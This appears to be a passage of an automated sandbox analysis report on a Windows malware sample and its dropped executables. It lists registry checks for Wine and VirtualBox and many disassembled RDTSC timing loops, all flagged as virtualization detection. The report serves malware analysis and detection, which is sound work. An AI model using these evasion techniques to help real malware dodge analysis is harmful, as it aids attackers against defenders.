Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E2072B second address: E2072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E2072F second address: E20761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0EA9AC3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A2A second address: E37A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FD5730h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A40 second address: E37A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A45 second address: E37A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F17B0FD5726h 0x00000013 jmp 00007F17B0FD572Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A67 second address: E37A71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A71 second address: E37A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0FD5726h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37BE4 second address: E37BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F17B0EA9ABFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37BFD second address: E37C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37C03 second address: E37C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37C07 second address: E37C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37C0B second address: E37C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ABC2 second address: E3ABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ABC6 second address: E3AC2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 call 00007F17B0EA9AB9h 0x0000000e push ebx 0x0000000f jbe 00007F17B0EA9ABCh 0x00000015 pop ebx 0x00000016 push eax 0x00000017 jmp 00007F17B0EA9AC7h 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007F17B0EA9AC8h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jnl 00007F17B0EA9ABCh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AC2A second address: E3ACB5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0FD573Dh 0x00000008 jmp 00007F17B0FD5737h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F17B0FD572Eh 0x00000018 pop eax 0x00000019 or dword ptr [ebp+122D1DA7h], edi 0x0000001f push 00000003h 0x00000021 push eax 0x00000022 jmp 00007F17B0FD5737h 0x00000027 pop edi 0x00000028 push 00000000h 0x0000002a jnp 00007F17B0FD572Ch 0x00000030 mov dword ptr [ebp+122D1DA7h], ebx 0x00000036 push 00000003h 0x00000038 mov esi, dword ptr [ebp+122D2C57h] 0x0000003e push B6CFDD2Eh 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F17B0FD5738h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ACB5 second address: E3ACB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ACB9 second address: E3ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 093022D2h 0x0000000e mov edi, dword ptr [ebp+122D2CE3h] 0x00000014 lea ebx, dword ptr [ebp+1245FA66h] 0x0000001a push eax 0x0000001b pushad 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AD5B second address: E3AD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AD61 second address: E3AD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AE7D second address: E3AEBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F17B0EA9AB6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2A88h], esi 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2AB6h], eax 0x0000001b mov ecx, dword ptr [ebp+122D2E7Bh] 0x00000021 push B40C15AEh 0x00000026 pushad 0x00000027 jng 00007F17B0EA9AC2h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AEBA second address: E3AF21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4BF3EAD2h 0x0000000e mov cl, 0Eh 0x00000010 push 00000003h 0x00000012 mov ecx, esi 0x00000014 push 00000000h 0x00000016 mov ecx, dword ptr [ebp+122D2CD3h] 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F17B0FD5728h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 je 00007F17B0FD5728h 0x0000003e mov cl, dh 0x00000040 call 00007F17B0FD5729h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F17B0FD5737h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AF21 second address: E3AF2B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F17B0EA9AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AF2B second address: E3AF9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jns 00007F17B0FD5726h 0x00000011 pop eax 0x00000012 jl 00007F17B0FD5728h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 push esi 0x00000021 jno 00007F17B0FD5726h 0x00000027 pop esi 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b pop edx 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f pushad 0x00000030 pushad 0x00000031 js 00007F17B0FD5726h 0x00000037 jmp 00007F17B0FD5730h 0x0000003c popad 0x0000003d jmp 00007F17B0FD572Ah 0x00000042 popad 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jmp 00007F17B0FD5731h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 push edx 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AF9C second address: E3B012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F17B0EA9AB8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 lea ebx, dword ptr [ebp+1245FA7Ah] 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F17B0EA9AB8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 xor dword ptr [ebp+122D1D9Ah], ecx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c jmp 00007F17B0EA9AC5h 0x00000051 pop edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C60F second address: E4C615 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C615 second address: E4C634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F17B0EA9AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F17B0EA9ABCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C634 second address: E4C638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C638 second address: E4C63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AA07 second address: E5AA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AA12 second address: E5AA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AD1C second address: E5AD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 js 00007F17B0FD5726h 0x0000000c jne 00007F17B0FD5726h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AD31 second address: E5AD38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AFB6 second address: E5AFC0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0FD5726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AFC0 second address: E5AFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5B155 second address: E5B159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C07D second address: E5C0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9AC3h 0x00000009 push eax 0x0000000a jmp 00007F17B0EA9ABEh 0x0000000f pop eax 0x00000010 pop esi 0x00000011 jng 00007F17B0EA9AD4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007F17B0EA9AB6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C0B3 second address: E5C0C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C1F7 second address: E5C1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C1FB second address: E5C1FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C1FF second address: E5C20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F17B0EA9AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C20B second address: E5C212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C3F0 second address: E5C3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C7A8 second address: E5C7AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5F445 second address: E5F449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5FABD second address: E5FAE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17B0FD572Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5FAE6 second address: E5FB3E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F17B0EA9AC8h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 push edx 0x00000012 jmp 00007F17B0EA9AC4h 0x00000017 pop edx 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e js 00007F17B0EA9AB8h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17B0EA9ABEh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E684EE second address: E684F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E684F2 second address: E684F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E684F6 second address: E684FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E2222D second address: E22233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E22233 second address: E22237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E22237 second address: E22266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F17B0EA9AC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6798D second address: E67991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E67C42 second address: E67C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E67C48 second address: E67C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FD572Fh 0x00000009 pop esi 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F17B0FD572Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F17B0FD5726h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E67C79 second address: E67C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E68073 second address: E680AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F17B0FD5726h 0x0000000a jmp 00007F17B0FD5735h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F17B0FD5736h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E680AE second address: E680B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E681E8 second address: E681F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F17B0FD5732h 0x00000008 jg 00007F17B0FD5726h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6832F second address: E68348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F17B0EA9ABFh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E68CCD second address: E68CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E690B2 second address: E690C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69383 second address: E69387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69387 second address: E6938D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E699E1 second address: E699E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E699E5 second address: E69A0C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F17B0EA9AC6h 0x00000008 jmp 00007F17B0EA9AC0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jbe 00007F17B0EA9AB6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69A0C second address: E69A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F17B0FD5726h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69C3A second address: E69C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69D1B second address: E69D34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD572Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6A222 second address: E6A227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6A227 second address: E6A22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6A22C second address: E6A239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6AC33 second address: E6ACDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F17B0FD572Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F17B0FD5728h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov esi, edi 0x00000027 jmp 00007F17B0FD5735h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F17B0FD5728h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 cld 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F17B0FD5728h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jng 00007F17B0FD5737h 0x0000006e jmp 00007F17B0FD5731h 0x00000073 rdtsc
